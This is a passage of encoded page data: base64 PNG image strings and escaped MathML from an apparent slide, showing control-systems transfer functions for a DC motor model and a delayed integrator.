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kPjxtaT5zPC9taT48L21mZW5jZWQ+PG1vPiYjeEEwOzwvbW8+PG1vPj08L21vPjxtbz4mI3gyMDA5OzwvbW8+PG1mcmFjPjxtcm93PjxtaT4mI3gzQzk7PC9taT48bWZlbmNlZD48bWk+czwvbWk+PC9tZmVuY2VkPjwvbXJvdz48bXJvdz48bWk+VjwvbWk+PG1mZW5jZWQ+PG1pPnM8L21pPjwvbWZlbmNlZD48L21yb3c+PC9tZnJhYz48bW8+JiN4QTA7PC9tbz48bW8+PTwvbW8+PG1vPiYjeDIwMDk7PC9tbz48bWZyYWM+PG1pPks8L21pPjxtcm93PjxtaT5KPC9taT48bWk+czwvbWk+PG1vPiYjeEEwOzwvbW8+PG1vPis8L21vPjxtbz4mI3hBMDs8L21vPjxtaT5iPC9taT48bW8+JiN4QTA7PC9tbz48bW8+KzwvbW8+PG1vPiYjeEEwOzwvbW8+PG1zdHlsZSBkaXNwbGF5c3R5bGU9InRydWUiPjxtZnJhYz48bXN1cD48bWk+SzwvbWk+PG1uPjI8L21uPjwvbXN1cD48bWk+UjwvbWk+PC9tZnJhYz48L21zdHlsZT48L21yb3c+PC9tZnJhYz48bW8+JiN4QTA7PC9tbz48bW8+PTwvbW8+PG1vPiYjeDIwMDk7PC9tbz48bWZyYWM+PG1zdWI+PG1pPkE8L21pPjxtbj4wPC9tbj48L21zdWI+PG1yb3c+PG1pPiYjeDNDNDs8L21pPjxtaT5zPC9taT48bW8+JiN4QTA7PC9tbz48bW8+KzwvbW8+PG1vPiYjeEEwOzwvbW8+PG1uPjE8L21uPjwvbXJvdz48L21mcmFjPjwvbXN0eWxlPjwvbWF0aD52h7b+AAAAAElFTkSuQmCC\&quot;,\&quot;slideId\&quot;:299,\&quot;accessibleText\&quot;:\&quot;G open parentheses s close parentheses space equals thin space fraction numerator omega open parentheses s close parentheses over denominator V open parentheses s close parentheses end fraction space equals thin space fraction numerator K over denominator J s space plus space b space plus space K squared over R end fraction space equals thin space fraction numerator A subscript 0 over denominator tau s space plus space 1 end fraction\&quot;,\&quot;imageHeight\&quot;:40.440329218106996},{\&quot;mathml\&quot;:\&quot;&lt;math style=\\\&quot;font-family:stix;font-size:16px;\\\&quot; xmlns=\\\&quot;http://www.w3.org/1998/Math/MathML\\\&quot;&gt;&lt;mstyle mathsize=\\\&quot;16px\\\&quot;&gt;&lt;mi&gt;D&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;/mfenced&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#x2009;&lt;/mo&gt;&lt;mfrac&gt;&lt;mrow&gt;&lt;mi&gt;A&lt;/mi&gt;&lt;mo&gt;.&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;msup&gt;&lt;mi&gt;e&lt;/mi&gt;&lt;mrow&gt;&lt;mo&gt;-&lt;/mo&gt;&lt;mi&gt;&amp;#x3C4;&lt;/mi&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;/mrow&gt;&lt;/msup&gt;&lt;/mrow&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;/mfrac&gt;&lt;/mstyle&gt;&lt;/math&gt;\&quot;,\&quot;base64Image\&quot;:\&quot;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